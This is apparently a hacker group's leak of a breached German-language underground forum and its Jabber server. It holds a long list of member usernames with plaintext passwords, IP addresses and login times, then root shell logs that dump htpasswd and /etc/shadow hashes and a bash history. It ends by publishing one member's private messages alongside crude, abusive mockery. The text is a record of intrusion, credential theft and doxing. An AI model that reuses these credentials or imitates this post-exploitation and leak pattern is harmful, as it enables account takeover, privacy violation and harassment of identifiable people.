+ryl666:lolomg123:83.216.241.77:January 2, 2011, 10:20 pm +boardmaster2010:16052009:78.55.59.70:January 3, 2011, 9:06 pm +siverman:276910:77.187.55.123:January 3, 2011, 2:03 pm +deathnote:Shinigami1:91.113.13.4:January 3, 2011, 5:19 pm +ghostt:qawsed:95.128.242.224:January 6, 2011, 3:11 am +kingmail:1qay2wsx3edc4rfv:79.209.8.113:January 3, 2011, 2:40 pm +xxlegendaxx:123234:89.217.150.18:January 3, 2011, 11:25 am +ndtbit:ndtbit7:80.146.17.64:January 3, 2011, 1:33 am +anno:valerka:90.136.45.75:January 4, 2011, 8:04 pm +garrisson:hallo123:92.106.62.29:January 3, 2011, 12:45 pm +spitfir3:012345:93.232.245.248:January 6, 2011, 12:41 pm +z0mg:hitler123456:77.23.89.32:January 3, 2011, 4:18 am +prisma:dasydasy15:87.166.73.53:January 3, 2011, 11:31 pm +itunes:edu123hil:24.170.79.116:January 3, 2011, 10:55 pm +leopard:teufeline<3swiss:213.163.64.43:January 2, 2011, 9:35 pm +m00n:berlin123:188.193.230.70:January 2, 2011, 9:51 pm +danemone:danemonekoklopspocicdvbt:92.241.168.24:January 4, 2011, 2:39 am +rolf32:fickmich069:213.163.65.50:January 2, 2011, 10:49 pm +accoli:hallo123:80.80.246.188:January 4, 2011, 11:23 am +st0re:123456:109.193.140.236:January 3, 2011, 4:22 pm +wrigleys:schwippschwapp999:93.192.161.49:January 2, 2011, 9:28 pm +jigga666:159951baumheide123:109.90.93.220:January 2, 2011, 11:42 pm +sar:6%$45De§$wER:92.231.164.131:January 3, 2011, 12:40 am +deffjeff:30111970:94.219.18.179:January 4, 2011, 1:48 pm +playa_:1abc23z1:217.248.142.13:January 2, 2011, 9:54 pm +cy0n!x:55de!xz7:178.3.205.85:January 4, 2011, 4:31 pm +mc_wrei:fiona2:84.75.38.254:January 3, 2011, 8:49 pm +br0unce:!$spainyswiss$:85.214.39.134:January 2, 2011, 9:00 pm +saxas:6bhy&#nVKenahwLU7oj6WzD&JA%ZnT:89.217.182.32:January 2, 2011, 9:35 pm +peevee:aimer89:78.50.91.135:January 3, 2011, 2:45 am +mark21:wiesonicht:217.248.156.69:January 3, 2011, 12:22 am +keks:Rof1rwe88$:178.1.51.57:January 3, 2011, 1:52 pm +cyborgx:dihodo62:91.50.105.196:January 3, 2011, 2:15 am +tomdanger:gogogo123:92.241.168.24:January 2, 2011, 9:34 pm +logg23:koruku11:91.48.156.95:January 2, 2011, 9:35 pm +inferior:210340:91.113.110.183:January 4, 2011, 2:56 pm +djinn:m28h611!:109.90.88.103:January 3, 2011, 8:05 pm +fred777:swissfaking.6x.toto:91.17.194.74:January 3, 2011, 1:22 am +w00dka:technobase1337:91.7.224.30:January 2, 2011, 10:51 pm +achmatov:hansdieter1:87.148.16.206:January 2, 2011, 11:51 pm +acidraining:$@cidr@ining$:95.208.135.191:January 3, 2011, 12:56 am +h0us3:josiaistschwarz:85.25.184.102:January 2, 2011, 9:10 pm +franky:Franky12345678909*:212.117.172.231:January 2, 2011, 9:16 pm +blueye:gnomi1337:202.60.66.32:January 3, 2011, 5:04 pm +chillerdady:K@t0LiDoR:87.181.209.28:January 3, 2011, 12:28 am +flash:nx6200ax:217.94.255.158:January 2, 2011, 11:59 pm +kuku:kuhfrosch123:79.242.127.235:January 3, 2011, 5:45 pm +mr.ru:kaik88ka:92.241.165.69:January 4, 2011, 1:56 am +n!sk:madonna119:95.143.192.190:January 2, 2011, 10:31 pm +kk3kk:Soundzz12:78.54.51.234:January 3, 2011, 3:07 am +raupi419:klISDMoVPNycc6zYnvLw3CaG:46.126.220.35:January 2, 2011, 9:31 pm +binary:sänger44:178.238.142.242:January 2, 2011, 11:41 pm +blu3cod3:lj49:93.220.25.103:January 5, 2011, 1:04 pm +armizor:qwerdxyas1234:91.48.104.120:January 3, 2011, 5:06 pm +zerox:Einfach-111:79.229.219.110:January 2, 2011, 10:36 pm +n0ise:Malle09*geil!!:212.117.165.197:January 3, 2011, 12:53 am +hard$tyler:martin55:92.241.190.253:January 6, 2011, 1:03 pm +ezel:enbüyükallah:85.177.167.57:January 2, 2011, 10:01 pm +spacejovi:Sara06.10:81.173.147.225:January 2, 2011, 9:25 pm +kingsize89:lesane25121989:78.42.183.79:January 2, 2011, 11:12 pm +sushi:SmokingGras:79.197.71.162:January 5, 2011, 11:05 pm +joe:12345asd:213.163.65.50:January 5, 2011, 4:08 pm +syntex:knallfrosch221:93.212.172.91:January 4, 2011, 10:55 am +afroman:JGMlms91:94.220.85.64:January 3, 2011, 4:27 am +master2k:5e4d3c2b1a:212.117.165.197:January 3, 2011, 12:07 pm +inex:coldmaster1337:93.82.245.122:January 5, 2011, 3:40 pm +smile:saufen123456:89.204.137.180:January 2, 2011, 11:05 pm +cch:anit77:93.232.245.48:January 6, 2011, 12:38 am +ziiieper:Computermausi21:188.100.191.130:January 2, 2011, 9:01 pm +moses908:161286:178.142.75.51:January 3, 2011, 3:17 am +sensemann88:10051964:79.248.91.90:January 6, 2011, 3:52 pm +eddy:aspirine:92.203.35.1:January 4, 2011, 5:54 pm +kugelblitz:WaBaXLx1:93.212.129.172:January 3, 2011, 8:20 pm +jamesdean:1qwerbeet:93.217.25.62:January 3, 2011, 4:32 pm +m0nic:IbebLadJ1993 #!:87.118.120.182:January 2, 2011, 9:24 pm +insame:crunk1994:88.67.124.238:January 2, 2011, 9:07 pm +psychoink:l*8R&t3CpgW6rw5z5H:82.82.217.166:January 3, 2011, 1:18 pm +jaroslav:ramona6305600:87.189.172.31:January 2, 2011, 9:20 pm +reto:dragon11:77.194.252.92:January 4, 2011, 4:20 pm +xerox:D#fqh88jb:89.182.159.187:January 2, 2011, 11:09 pm +gamerfis:$&%?ZJ94:85.176.78.21:January 2, 2011, 11:14 pm +nko:password:nox:87.173.185.216:January 3, 2011, 12:31 pm +yaboybigt:=-_})-=0:81.210.167.79:January 3, 2011, 5:11 am +bonx:bubu1818:89.204.153.167:January 4, 2011, 1:54 pm +dogma:walkthelineswiss:92.106.249.125:January 3, 2011, 1:24 am +ratzi:lusenheide:109.91.140.55:January 7, 2011, 12:33 am +3p!cf4!l:tele2sux:92.241.165.69:January 5, 2011, 2:55 pm +nagilum:gilgamesch1415926535:84.19.169.234:January 2, 2011, 9:28 pm +3dr:leeroyjenkins:84.59.162.27:January 2, 2011, 11:22 pm +erazorx8:ficken:92.225.129.75:January 4, 2011, 6:32 pm +mopedfahrer:mozilla006:84.19.169.162:January 5, 2011, 10:46 pm +darookie:Pr0d1gyThe:87.159.47.180:January 3, 2011, 12:08 am +paranoid:crbahP962P:91.66.225.130:January 3, 2011, 6:10 pm +devil234:R/m<7ctN&AEr +require valid-user + + +1:$1$VuIT5qnw$SD8.UzvKgXUwoufPSiaR/. + +# cd board && ls -la +total 2416 +drwxr-xr-x 23 swissfaking swissfaking 4096 Jan 4 22:30 . +drwxr-xr-x 6 swissfaking swissfaking 4096 Dec 31 18:47 .. +-rw-r--r-- 1 swissfaking swissfaking 238 Oct 24 13:33 .htaccess22foo +-rw-r--r-- 1 swissfaking swissfaking 39 Oct 24 13:33 .htpasswd +-rw-r--r-- 1 swissfaking swissfaking 23823 Mar 26 2010 ajax.php +-rw-r--r-- 1 swissfaking swissfaking 75490 Mar 26 2010 album.php +-rw-r--r-- 1 swissfaking swissfaking 17119 Mar 26 2010 announcement.php +drwxr-xr-x 2 swissfaking swissfaking 4096 Mar 26 2010 archive +-rw-r--r-- 1 swissfaking swissfaking 18288 Mar 26 2010 attachment.php +-rw-r--r-- 1 swissfaking swissfaking 35093 Apr 14 2010 banned.jpg +drwxr-xr-x 2 swissfaking swissfaking 4096 Nov 17 21:25 banners +-rw-r--r-- 1 swissfaking swissfaking 75309 Mar 26 2010 calendar.php +-rw-r--r-- 1 swissfaking swissfaking 43 Mar 26 2010 clear.gif +drwxr-xr-x 5 swissfaking swissfaking 4096 Jan 2 16:30 clientscript +-rw-r--r-- 1 swissfaking swissfaking 15346 Mar 26 2010 converse.php +-rw-r--r-- 1 swissfaking swissfaking 555 Oct 24 13:33 cookie.html +drwxr-xr-x 8 swissfaking swissfaking 4096 May 7 2010 cpstyles +-rw-r--r-- 1 swissfaking swissfaking 49309 May 19 2010 credits.php +-rw-r--r-- 1 swissfaking swissfaking 3299 Mar 26 2010 cron.php +drwxr-xr-x 3 swissfaking swissfaking 4096 Mar 26 2010 customavatars +drwxr-xr-x 3 swissfaking swissfaking 4096 Mar 26 2010 customgroupicons +drwxr-xr-x 2 swissfaking swissfaking 4096 Mar 26 2010 customprofilepics +-rw-r--r-- 1 swissfaking swissfaking 47736 Mar 26 2010 editpost.php +-rw-r--r-- 1 swissfaking swissfaking 29479 Mar 26 2010 external.php +drwxr-xr-x 2 swissfaking swissfaking 4096 Jan 4 22:35 falloutadm +-rw-r--r-- 1 swissfaking swissfaking 9765 Mar 26 2010 faq2.phpoldold +-rw-r--r-- 1 swissfaking swissfaking 4286 Mar 26 2010 favicon.gif +-rw-r--r-- 1 swissfaking swissfaking 35640 Mar 26 2010 forumdisplay.php +-rw-r--r-- 1 swissfaking swissfaking 39820 Mar 26 2010 global.php +-rw-r--r-- 1 swissfaking swissfaking 137864 Mar 26 2010 group.php +-rw-r--r-- 1 swissfaking swissfaking 24898 Mar 26 2010 group_inlinemod.php +-rw-r--r-- 1 swissfaking swissfaking 10816 Mar 26 2010 groupsubscription.php +-rw-r--r-- 1 swissfaking swissfaking 9026 Mar 26 2010 image.php +drwxr-xr-x 21 swissfaking swissfaking 4096 Oct 31 22:09 images +drwxr-xr-x 2 swissfaking swissfaking 4096 Apr 9 2010 img +drwxr-xr-x 7 swissfaking swissfaking 12288 Jan 2 22:12 includes +-rw-r--r-- 1 swissfaking swissfaking 19575 Nov 27 04:26 index.php +drwxr-xr-x 6 swissfaking swissfaking 4096 Mar 26 2010 infernoshout +-rw-r--r-- 1 swissfaking swissfaking 11083 Mar 26 2010 infernoshout.php +-rw-r--r-- 1 swissfaking swissfaking 43808 Mar 26 2010 infraction.php +-rw-r--r-- 1 swissfaking swissfaking 182738 Mar 26 2010 inlinemod.php +-rw-r--r-- 1 swissfaking swissfaking 5850 Mar 26 2010 itrader.php +-rw-r--r-- 1 swissfaking swissfaking 11784 Mar 26 2010 itrader_detail.php +-rw-r--r-- 1 swissfaking swissfaking 11841 Mar 26 2010 itrader_feedback.php +-rw-r--r-- 1 swissfaking swissfaking 1401 Mar 26 2010 itrader_global.php +-rw-r--r-- 1 swissfaking swissfaking 19557 Mar 26 2010 itrader_main.php +-rw-r--r-- 1 swissfaking swissfaking 3570 Mar 26 2010 itrader_report.php +drwxr-xr-x 2 swissfaking swissfaking 4096 Oct 10 19:11 jabber +-rw-r--r-- 1 swissfaking swissfaking 10321 Mar 26 2010 joinrequests.php +-rw-r--r-- 1 swissfaking swissfaking 10201 Mar 26 2010 login.php +-rw-r--r-- 1 swissfaking swissfaking 17048 Mar 26 2010 member.php +-rw-r--r-- 1 swissfaking swissfaking 15910 Mar 26 2010 member_inlinemod.php +-rw-r--r-- 1 swissfaking swissfaking 35880 Mar 26 2010 memberlist.php +-rw-r--r-- 1 swissfaking swissfaking 23846 Mar 26 2010 misc.php +-rw-r--r-- 1 swissfaking swissfaking 63310 Mar 26 2010 moderation.php +-rw-r--r-- 1 swissfaking swissfaking 6735 Mar 26 2010 moderator.php +-rw-r--r-- 1 swissfaking swissfaking 18456 Mar 26 2010 newattachment.php +-rw-r--r-- 1 swissfaking swissfaking 37083 Mar 26 2010 newreply.php +-rw-r--r-- 1 swissfaking swissfaking 18890 Mar 26 2010 newthread.php +-rw-r--r-- 1 swissfaking swissfaking 19583 Mar 26 2010 online.php +-rw-r--r-- 1 swissfaking swissfaking 7675 Mar 26 2010 payment_gateway.php +-rw-r--r-- 1 swissfaking swissfaking 11889 Mar 26 2010 payments.php +-rw-r--r-- 1 swissfaking swissfaking 7868 Mar 26 2010 picture.php +-rw-r--r-- 1 swissfaking swissfaking 22022 Mar 26 2010 picture_inlinemod.php +-rw-r--r-- 1 swissfaking swissfaking 25293 Mar 26 2010 picturecomment.php +drwxr-xr-x 2 swissfaking swissfaking 4096 May 19 2010 plugins +-rw-r--r-- 1 swissfaking swissfaking 27394 Mar 26 2010 poll.php +drwxr-xr-x 2 swissfaking swissfaking 4096 Mar 26 2010 polls +-rw-r--r-- 1 swissfaking swissfaking 9491 Mar 26 2010 posthistory.php +-rw-r--r-- 1 swissfaking swissfaking 75622 Jul 17 20:16 postings.php +-rw-r--r-- 1 swissfaking swissfaking 6573 Mar 26 2010 printthread.php +-rw-r--r-- 1 swissfaking swissfaking 70727 Mar 26 2010 private.php +-rw-r--r-- 1 swissfaking swissfaking 152315 Mar 26 2010 profile.php +-rw-r--r-- 1 swissfaking swissfaking 555 Mar 26 2010 quickpreview.php +-rw-r--r-- 1 swissfaking swissfaking 39730 Mar 26 2010 register.php +-rw-r--r-- 1 swissfaking swissfaking 5667 Mar 26 2010 report.php +-rw-r--r-- 1 swissfaking swissfaking 13699 Mar 26 2010 reputation.php +drwxr-xr-x 2 swissfaking swissfaking 4096 Nov 30 01:07 runnerzzzmod +-rw-r--r-- 1 swissfaking swissfaking 128640 May 6 2010 search.php +-rw-r--r-- 1 swissfaking swissfaking 20673 Mar 26 2010 sendmessage.php +-rw-r--r-- 1 swissfaking swissfaking 9988 Mar 26 2010 showgroups.php +-rw-r--r-- 1 swissfaking swissfaking 11353 Mar 26 2010 showpost.php +-rw-r--r-- 1 swissfaking swissfaking 73449 Mar 26 2010 showthread.php +drwxr-xr-x 2 swissfaking swissfaking 4096 Mar 26 2010 signaturepics +-rw-r--r-- 1 swissfaking swissfaking 47803 Mar 26 2010 statistics__blocked_.php +drwxr-xr-x 2 swissfaking swissfaking 4096 Mar 26 2010 statsmod___blocked_ +-rw-r--r-- 1 swissfaking swissfaking 32827 Mar 26 2010 subscription.php +-rw-r--r-- 1 swissfaking swissfaking 2091 Mar 26 2010 swisss.php +-rw-r--r-- 1 swissfaking swissfaking 13344 Mar 26 2010 tags.php +-rw-r--r-- 1 swissfaking swissfaking 8671 Mar 26 2010 threadrate.php +-rw-r--r-- 1 swissfaking swissfaking 12394 Mar 26 2010 threadtag.php +-rw-r--r-- 1 swissfaking swissfaking 34494 Mar 26 2010 usercp.php +-rw-r--r-- 1 swissfaking swissfaking 19077 Mar 26 2010 usernote.php +-rw-r--r-- 1 swissfaking swissfaking 27339 Mar 26 2010 visitormessage.php +drwxr-xr-x 5 swissfaking swissfaking 4096 Mar 26 2010 vmoods +drwxr-xr-x 13 swissfaking swissfaking 4096 Mar 26 2010 zseries_red +drwxr-xr-x 3 swissfaking swissfaking 4096 Jan 3 22:52 zxpwmvprzzugrzms + +# cat includes/config.php + +require valid-user + + +1:$1$VuIT5qnw$SD8.UzvKgXUwoufPSiaR/. + +# cd zxpwmvprzzugrzms && ls -la +total 2068 +drwxr-xr-x 3 swissfaking swissfaking 4096 Jan 3 22:52 . +drwxr-xr-x 23 swissfaking swissfaking 4096 Jan 4 22:30 .. +-rw-r--r-- 1 swissfaking swissfaking 495 Jan 3 22:38 .htaccess +-rw-r--r-- 1 swissfaking swissfaking 26 Jan 3 22:38 .htpasswd +-rw-r--r-- 1 swissfaking swissfaking 19317 Jan 3 22:52 accessmask.php +-rw-r--r-- 1 swissfaking swissfaking 39558 Jan 3 22:52 admincalendar.php +-rw-r--r-- 1 swissfaking swissfaking 49620 Jan 3 22:52 admininfraction.php +-rw-r--r-- 1 swissfaking swissfaking 19126 Jan 3 22:52 adminlog.php +-rw-r--r-- 1 swissfaking swissfaking 8125 Jan 3 22:52 adminpermissions.php +-rw-r--r-- 1 swissfaking swissfaking 25492 Jan 3 22:52 adminreputation.php +-rw-r--r-- 1 swissfaking swissfaking 32824 Jan 3 22:52 album.php +-rw-r--r-- 1 swissfaking swissfaking 12980 Jan 3 22:52 announcement.php +-rw-r--r-- 1 swissfaking swissfaking 54994 Jan 3 22:52 attachment.php +-rw-r--r-- 1 swissfaking swissfaking 12488 Jan 3 22:52 attachmentpermission.php +-rw-r--r-- 1 swissfaking swissfaking 19331 Jan 3 22:52 avatar.php +-rw-r--r-- 1 swissfaking swissfaking 16437 Jan 3 22:52 bbcode.php +-rw-r--r-- 1 swissfaking swissfaking 14758 Jan 3 22:51 bookmarksite.php +-rw-r--r-- 1 swissfaking swissfaking 12059 Jan 3 22:51 calendarpermission.php +-rw-r--r-- 1 swissfaking swissfaking 43 Jan 3 22:51 clear.gif +drwxr-xr-x 2 swissfaking swissfaking 4096 Jan 3 22:53 control_examples +-rw-r--r-- 1 swissfaking swissfaking 65076 Jan 3 22:51 credits_admin.php +-rw-r--r-- 1 swissfaking swissfaking 24025 Jan 3 22:51 cronadmin.php +-rw-r--r-- 1 swissfaking swissfaking 10710 Jan 3 22:51 cronlog.php +-rw-r--r-- 1 swissfaking swissfaking 34063 Jan 3 22:51 css.php +-rw-r--r-- 1 swissfaking swissfaking 21795 Jan 3 22:51 diagnostic.php +-rw-r--r-- 1 swissfaking swissfaking 11724 Jan 3 22:51 email.php +-rw-r--r-- 1 swissfaking swissfaking 17458 Jan 3 22:51 faq.php +-rw-r--r-- 1 swissfaking swissfaking 12143 Jan 3 22:51 force_read_thread.php +-rw-r--r-- 1 swissfaking swissfaking 30113 Jan 3 22:51 forum.php +-rw-r--r-- 1 swissfaking swissfaking 30039 Jan 3 22:51 forumpermission.php +-rw-r--r-- 1 swissfaking swissfaking 7692 Jan 3 22:51 global.php +-rw-r--r-- 1 swissfaking swissfaking 25898 Jan 3 22:51 help.php +-rw-r--r-- 1 swissfaking swissfaking 51895 Jan 3 22:51 image.php +-rw-r--r-- 1 swissfaking swissfaking 45450 Jan 3 22:51 index.php +-rw-r--r-- 1 swissfaking swissfaking 8756 Jan 3 22:51 infernoshoutlog.php +-rw-r--r-- 1 swissfaking swissfaking 3251 Jan 3 22:50 itrader_misc.php +-rw-r--r-- 1 swissfaking swissfaking 37384 Jan 3 22:50 language.php +-rw-r--r-- 1 swissfaking swissfaking 51623 Jan 3 22:50 mgc_cb_evo.php +-rw-r--r-- 1 swissfaking swissfaking 69534 Jan 3 22:50 misc.php +-rw-r--r-- 1 swissfaking swissfaking 34140 Jan 3 22:50 moderator.php +-rw-r--r-- 1 swissfaking swissfaking 16889 Jan 3 22:50 modlog.php +-rw-r--r-- 1 swissfaking swissfaking 1837 Jan 3 22:50 newsproxy.php +-rw-r--r-- 1 swissfaking swissfaking 30631 Jan 3 22:50 notice.php +-rw-r--r-- 1 swissfaking swissfaking 43202 Jan 3 22:50 options.php +-rw-r--r-- 1 swissfaking swissfaking 12026 Jan 3 22:50 passwordcheck.php +-rw-r--r-- 1 swissfaking swissfaking 62644 Jan 3 22:50 phrase.php +-rw-r--r-- 1 swissfaking swissfaking 85854 Jan 3 22:50 plugin.php +-rw-r--r-- 1 swissfaking swissfaking 33055 Jan 3 22:50 prefix.php +-rw-r--r-- 1 swissfaking swissfaking 49757 Jan 3 22:50 profilefield.php +-rw-r--r-- 1 swissfaking swissfaking 11300 Jan 3 22:49 ranks.php +-rw-r--r-- 1 swissfaking swissfaking 5696 Jan 3 22:49 read_pms_deu.php +-rw-r--r-- 1 swissfaking swissfaking 15668 Jan 3 22:49 replacement.php +-rw-r--r-- 1 swissfaking swissfaking 11004 Jan 3 22:49 resources.php +-rw-r--r-- 1 swissfaking swissfaking 30488 Jan 3 22:49 ripper.php +-rw-r--r-- 1 swissfaking swissfaking 20657 Jan 3 22:49 rssposter.php +-rw-r--r-- 1 swissfaking swissfaking 13164 Jan 3 22:49 socialgroup_icon.php +-rw-r--r-- 1 swissfaking swissfaking 17538 Jan 3 22:49 socialgroups.php +-rw-r--r-- 1 swissfaking swissfaking 11215 Jan 3 22:49 stamp.php +-rw-r--r-- 1 swissfaking swissfaking 8623 Jan 3 22:49 stats.php +-rw-r--r-- 1 swissfaking swissfaking 8170 Jan 3 22:49 subscriptionpermission.php +-rw-r--r-- 1 swissfaking swissfaking 62261 Jan 3 22:49 subscriptions.php +-rw-r--r-- 1 swissfaking swissfaking 91677 Jan 3 22:49 template.php +-rw-r--r-- 1 swissfaking swissfaking 3911 Jan 3 22:49 textarea.php +-rw-r--r-- 1 swissfaking swissfaking 58666 Jan 3 22:49 thread.php +-rw-r--r-- 1 swissfaking swissfaking 8300 Jan 3 22:49 threadfields_admin.php +-rw-r--r-- 1 swissfaking swissfaking 95176 Jan 3 22:48 user.php +-rw-r--r-- 1 swissfaking swissfaking 56136 Jan 3 22:48 usergroup.php +-rw-r--r-- 1 swissfaking swissfaking 7272 Jan 3 22:48 usertitle.php +-rw-r--r-- 1 swissfaking swissfaking 75581 Jan 3 22:48 usertools.php +-rw-r--r-- 1 swissfaking swissfaking 18753 Jan 3 22:48 verify.php + +# cat .htpasswd +Fickmaus:9Zistd9IicJdY + +# cd ../jabber && ls -la +total 684 +drwxr-xr-x 2 swissfaking swissfaking 4096 Oct 10 19:11 . +drwxr-xr-x 23 swissfaking swissfaking 4096 Jan 4 22:30 .. +-rw-r--r-- 1 swissfaking swissfaking 7948 Oct 10 18:54 AC_OETags.js +-rw-r--r-- 1 swissfaking swissfaking 629979 Oct 10 18:56 SparkWeb.swf +-rw-r--r-- 1 swissfaking swissfaking 4286 Oct 10 19:10 favicon.gif +-rw-r--r-- 1 swissfaking swissfaking 3638 Oct 10 18:54 favicon.ico +-rw-r--r-- 1 swissfaking swissfaking 1272 Oct 10 18:54 history.htm +-rw-r--r-- 1 swissfaking swissfaking 1292 Oct 10 18:54 history.js +-rw-r--r-- 1 swissfaking swissfaking 2656 Oct 10 18:54 history.swf +-rw-r--r-- 1 swissfaking swissfaking 15260 Oct 10 19:11 jabber.html +-rw-r--r-- 1 swissfaking swissfaking 2518 Oct 10 18:55 osxmousewheel.js +-rw-r--r-- 1 swissfaking swissfaking 657 Oct 10 18:55 playerProductInstall.swf + + +While looking through the forums we came across someone special... +________________________________________________________________________ +From fred777 to Fickmaus; Subject: Mod? + +Hi Ficki, ich freu mich, dass swiss wieder online ist und wollte fragen +ob ihr Unterstützung benötigt, bzw. ich würde gerne meine Hilfe anbieten.. + +Designen, moderieren etc. +Als Moderator würde ich wenn dann gerne die Sections: +Coding und Hacking/Cracking moderieren. Vielleicht braucht ihr aber auch +gar keine, ich dachte nur für einen guten Start ist das nicht schlecht. + +Selbstverständlich werde ich auch noch einiges posten + +Falls ihr mich nicht kennt, schaut mal auf +fred777.5x.to, free-hack, back2hack etc. vorbei ;) + +Danke +________________________________________________________________________ +From fred777 to SzeneCrasher; Subject: Hi Crasher + +Jo da die ersten Mods eingestellt werden wollte ich mal fragen bezüglich +der Hacking/Coding Section. +Ich würde die gerne moderieren und euch helfen. +Das ich kein Mist mache solltest du wissen, bin schon lange im Netz +unterwegs, FH,Back2hack etc.. + +Solltest du Fragen haben: ICQ 390271540 + +Vielleicht wird das ja was, danke schonmal +________________________________________________________________________ +From fred777 to erdnuss; Subject: Mod? + +Ja, da nun ja auch Sections geändert worden sind und es voller wird, +wollte ich nun bei den Admins fragen wie es so ist mit den Moderatoren +in der Security/Hacking Sections. +Habe auch schon letztens Ficki gefragt, der meinte abwarten... + +Es müssten z.B. aktuell einige Beiträge verschoben werden. Ich würde +gerne Moderator in dieser Section werden, darum die Frage. +Kennen könnte man mich von Back2hack und Freehack ;) +________________________________________________________________________ +From fred777 to SzeneCrasher; Subject: Frage + +Ich wollte mich nochmal erkundigen, wie es mit den Moderatoren aussieht, +Swiss ist ja nun voller und größer geworden. Ich kann auch nochmal eine +komplette Bewerbung abschicken wenn ihr welche sucht. +________________________________________________________________________ +From fred777 to SzeneCrasher; Subject: Aussichten + +Ja ich wollte mal fragen, wie es so steht, bezüglich der +Moderatorenanfrage und was die anderem Teamies gesagt haben.. + +Gruß _fred_ +________________________________________________________________________ + + +FUCK. Are you serious? We knew you're lame. We knew you're dying for +fame and we even knew you suck cock but we were absolutely not aware +of the extent this has come to. Are you really that desperate to +moderate a fucking preschool that you start begging for it only days +after your registration? Damnit fred, you're pretty rundown. + + + ____________________________________________________________________ +| __ __ | +| .-----.--.--.-----.| |_.-----.| |--.-----.--.--. | +| | _ | | | _ || _| -__|| _ | _ |_ _| | +| |__ |_____|_____||____|_____||_____|_____|__.__| | +|________|__|________________________________________________________| +| | +| From fred777 to Fickmaus; Subject: Jabber | +| Ja ich hätte gerne einen Account, habe noch keinen. | +| Name: fred777 | +|____________________________________________________________________| + +Right on cue, chap! +Not only is the board full of criminal kids, but they also provide a +jabber server for their users. While at it, we decided to tap in and +see what they're doing there, we also got some loggin going and +prepared a nice collection of their messages as well as a full backup +for you. + + +# uname -a +Linux jabbersw 2.6.18-194.3.1.el5.028stab069.6 #1 SMP Wed May 26 18:31:05 MSD 2010 i686 GNU/Linux + +# id +uid=0(root) gid=0(root) + +# cat /etc/passwd /etc/shadow +root:x:0:0:root:/root:/bin/bash +daemon:x:1:1:daemon:/usr/sbin:/bin/sh +bin:x:2:2:bin:/bin:/bin/sh +sys:x:3:3:sys:/dev:/bin/sh +sync:x:4:65534:sync:/bin:/bin/sync +games:x:5:60:games:/usr/games:/bin/sh +man:x:6:12:man:/var/cache/man:/bin/sh +lp:x:7:7:lp:/var/spool/lpd:/bin/sh +mail:x:8:8:mail:/var/mail:/bin/sh +news:x:9:9:news:/var/spool/news:/bin/sh +uucp:x:10:10:uucp:/var/spool/uucp:/bin/sh +proxy:x:13:13:proxy:/bin:/bin/sh +www-data:x:33:33:www-data:/var/www:/bin/sh +backup:x:34:34:backup:/var/backups:/bin/sh +list:x:38:38:Mailing List Manager:/var/list:/bin/sh +irc:x:39:39:ircd:/var/run/ircd:/bin/sh +gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/bin/sh +nobody:x:65534:65534:nobody:/nonexistent:/bin/sh +libuuid:x:100:101::/var/lib/libuuid:/bin/sh +bind:x:101:104::/var/cache/bind:/bin/false +fetchmail:x:102:65534::/var/lib/fetchmail:/bin/false +sshd:x:103:65534::/var/run/sshd:/usr/sbin/nologin +stunnel4:x:104:106::/var/run/stunnel4:/bin/false +smmta:x:105:107:Mail Transfer Agent,,,:/var/lib/sendmail:/bin/false +smmsp:x:106:108:Mail Submission Program,,,:/var/lib/sendmail:/bin/false +jabber:x:107:65534::/var/run/jabber:/bin/false +messagebus:x:108:109::/var/run/dbus:/bin/false +avahi:x:109:110:Avahi mDNS daemon,,,:/var/run/avahi-daemon:/bin/false +postgres:x:110:112:PostgreSQL administrator,,,:/var/lib/postgresql:/bin/bash +identd:x:111:65534::/var/run/identd:/bin/false +openfire:x:112:113:Openfire XMPP server,,,:/var/lib/openfire:/bin/false +root:$1$58.RHhjn$9z8MH2daUFLKAJclEq7A8.:14818:0:99999:7::: +daemon:*:14725:0:99999:7::: +bin:*:14725:0:99999:7::: +sys:*:14725:0:99999:7::: +sync:*:14725:0:99999:7::: +games:*:14725:0:99999:7::: +man:*:14725:0:99999:7::: +lp:*:14725:0:99999:7::: +mail:*:14725:0:99999:7::: +news:*:14725:0:99999:7::: +uucp:*:14725:0:99999:7::: +proxy:*:14725:0:99999:7::: +www-data:*:14725:0:99999:7::: +backup:*:14725:0:99999:7::: +list:*:14725:0:99999:7::: +irc:*:14725:0:99999:7::: +gnats:*:14725:0:99999:7::: +nobody:*:14725:0:99999:7::: +libuuid:!:14725:0:99999:7::: +bind:*:14725:0:99999:7::: +fetchmail:*:14725:0:99999:7::: +sshd:*:14725:0:99999:7::: +stunnel4:!:14725:0:99999:7::: +smmta:*:14725:0:99999:7::: +smmsp:*:14725:0:99999:7::: +jabber:*:14817:0:99999:7::: +messagebus:*:14829:0:99999:7::: +avahi:*:14829:0:99999:7::: +postgres:*:14829:0:99999:7::: +identd:*:14829:0:99999:7::: +openfire:*:14829:0:99999:7::: + +# cd /root && ls -la +total 36 +drwxr-xr-x 3 root root 4096 Jan 3 01:45 . +drwxr-xr-x 20 root root 4096 Dec 30 13:30 .. +-rw------- 1 root root 5215 Sep 27 21:42 .bash_history +-rw-r--r-- 1 root root 412 Dec 16 2004 .bashrc +-rw-r--r-- 1 root root 140 Nov 19 2007 .profile +drwx------ 2 root root 4096 Jan 3 00:35 .ssh +-rw------- 1 root root 6186 Jan 3 01:45 .viminfo + +# cat .bash_history +cd etc +ls -l +cd jabber +ls -l +vi jabber.xml +ls -l +vi jabber.cfg +cd .. +ls -l +cd .. +ls -l +cd jabberd/jabber-1.4.2a +ls -l +cd var +cd run +ls -l +cd jabber +ls -l +ls -l +cd .. +ls -l +cd etc +cd jabber +ls -l +Wget http://ports.internal.vlink.ru/distfiles/mu-conference-0.6.0.tar.gz +wget http://ports.internal.vlink.ru/distfiles/mu-conference-0.6.0.tar.gz +ls -l +gzip -d mu-conference-0.6.0.tar.gz +ls -l +tar -xvf mu-conference-0.6.0.tar +ls -l +cd mu-conference-0.6.0 +ls -l +make +Makefile +ls -l +ps aux +cd src +ls -l +cd .. +ls -l +cd scripts +ls -l +cd .. +ls -l +cd ./ +ls -l +cd .. +ls -l +vi jabber.xml +cd mu-conference-0.6.0 +ls -l +make +cd src +ls -l +make +cd .. +cd .. +cd .. +cd .. +ls -l +cd /etc/jabber +ls -l +del mu-conference-0.6.0.tar +rmdir mu-conference-0.6.0 + mu-conference-0.6.0 +rmdir -p mu-conference-0.6.0 +rmdir --ignore-fail-on-non-empty mu-conference-0.6.0 +ls -l +rmdir --help +rmdir --ignore mu-conference-0.6.0 +ls -l +rmdir -i mu-conference-0.6.0 +rm mu-conference-0.6.0.tar +ls -l +rm mu-conference-0.6.0 +rm -r mu-conference-0.6.0 +ls -l +cd .. +cd .. +cd .. +ls -l +wget 